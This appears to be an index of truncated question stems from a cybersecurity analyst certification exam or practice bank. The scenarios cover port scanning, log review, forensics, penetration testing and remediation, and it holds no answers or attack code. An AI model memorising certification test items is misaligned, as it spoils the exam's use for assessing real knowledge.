An analyst was testing the latest version of internally developed CRM...
An analyst wants to use a command line tool to identify open ports and...
While reviewing the proxy logs, the security analyst noticed a...
Which of the following principles describes how a security analyst...
A company invested 10 percent of its entire annual budget in security...
A cybersecurity analyst is reviewing the current BYOD security...
A web application has a newly discovered vulnerability in the...
Due to the new regulations, a company has decided to institute an...
A software assurance lab is performing a dynamic assessment by...
A security analyst is performing a forensic analysis on a...
The security operations team is conducting a mock forensics...
A university wants to increase the security posture of its network by...
The number of emails containing malicious attachments has increased...
A threat intelligence analyst who works for a financial services firm...
During a penetration test, a red team was able to collect the...
An organization is requesting the development of a disaster recovery...
Which of the following items represents a document that includes...
Which of the following remediation strategies are MOST effective in...
An analyst finds that unpatched servers have undetected...
Considering confidentiality and integrity, which of the following...
The new chief technology officer is seeking recommendations for...
An organization wants to remediate vulnerabilities associated with its...
Which of the following has occurred
Which of the following represent the reasoning behind careful of the...
Which of the following actions should occur to address any open issues...
An analyst was tasked with providing recommendations of technologies...
A security analyst received a compromised workstation. The...